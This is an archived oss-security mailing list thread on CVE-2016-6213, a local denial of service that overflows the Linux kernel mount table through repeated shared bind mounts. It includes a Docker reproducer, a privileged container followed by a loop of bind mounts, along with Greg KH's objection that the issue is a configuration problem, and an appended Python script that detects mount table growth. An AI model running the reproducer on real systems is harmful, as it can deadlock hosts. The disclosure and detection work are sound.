oss-sec mailing list archives
Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
From: CAI Qian <caiqian () redhat com>
Date: Thu, 14 Jul 2016 12:15:02 -0400 (EDT)
Maybe this is a better reproducer using docker. It is exploitable even with user namespace enabled.

# docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash
# cat /proc/self/uid_map
0 995 65536
# cat /proc/self/gid_map
0 992 65536

(inside container)
# for i in `seq 1 20`; do mount -o bind /mnt/1 /mnt/2; done

CAI Qian

----- Original Message -----
From: "Greg KH" <greg () kroah com>
To: oss-security () lists openwall com
Cc: caiqian () redhat com, cve-assign () mitre org
Sent: Wednesday, July 13, 2016 6:45:00 PM
Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount

On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign () mitre org wrote:
> It was reported that the mount table expands by a power-of-two with each bind mount command.
> If the system is configured in the way that a non-root user allows bind mount even if with limit number of bind mount allowed, a non-root user could cause a local DoS by quickly overflow the mount table.
> it will cause a deadlock for the whole system,
> form of unlimited memory consumption that is causing the problem
> Use CVE-2016-6213.

A CVE for an "improperly configured system"? Huh? What distro has such a configuration set by default?

This isn't a kernel bug, so what is this CVE classified as being "against"? It better not be against the Linux kernel...

confused,

greg k-h
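A defender-side check for the mount table growth discussed in this thread, as an added example that is not part of the original messages: it parses `/proc/self/mountinfo`-format text and reports the total mount count, mount points carrying many stacked mounts, and the largest shared peer group. The sample lines, the function names and the thresholds are constructed assumptions.

```python
from collections import Counter

# Constructed sample in /proc/self/mountinfo format (not captured from a real host).
SAMPLE = """\
22 1 8:1 / / rw,relatime shared:1 - ext4 /dev/sda1 rw
40 22 8:2 / /mnt rw,relatime shared:2 - ext4 /dev/sda2 rw
41 40 8:2 /1 /mnt/2 rw,relatime shared:2 - ext4 /dev/sda2 rw
42 41 8:2 /1 /mnt/2 rw,relatime shared:2 - ext4 /dev/sda2 rw
43 42 8:2 /1 /mnt/2 rw,relatime shared:2 - ext4 /dev/sda2 rw
44 22 0:20 / /run rw,nosuid - tmpfs tmpfs rw
"""

def parse_mountinfo(text):
    """Return one dict per mount line; optional fields end at the lone '-'."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        try:
            sep = fields.index("-", 6)  # six fixed fields precede the optional ones
        except ValueError:
            continue  # truncated or malformed line
        if len(fields) < sep + 3:
            continue
        optional = fields[6:sep]  # e.g. shared:N, master:N
        peer = next((f for f in optional if f.startswith("shared:")), None)
        mounts.append({"id": int(fields[0]), "parent": int(fields[1]),
                       "mount_point": fields[4], "peer_group": peer,
                       "fstype": fields[sep + 1]})
    return mounts

def report(mounts, stack_limit=3, total_limit=1000):
    """Flag signs of runaway growth; both limits are assumed, tune per host."""
    stacked = Counter(m["mount_point"] for m in mounts)
    groups = Counter(m["peer_group"] for m in mounts if m["peer_group"])
    return {
        "total": len(mounts),
        "over_total": len(mounts) > total_limit,
        "stacked": {p: n for p, n in stacked.items() if n >= stack_limit},
        "largest_group": groups.most_common(1)[0] if groups else None,
    }

if __name__ == "__main__":
    try:
        with open("/proc/self/mountinfo") as fh:
            data = fh.read()
    except OSError:
        data = SAMPLE  # fall back to the constructed sample off Linux
    print(report(parse_mountinfo(data)))
```

Run periodically on a container host, a sudden jump in `total` or in one peer group's size is the signal to look at which workload holds `SYS_ADMIN` together with a shared-propagation volume.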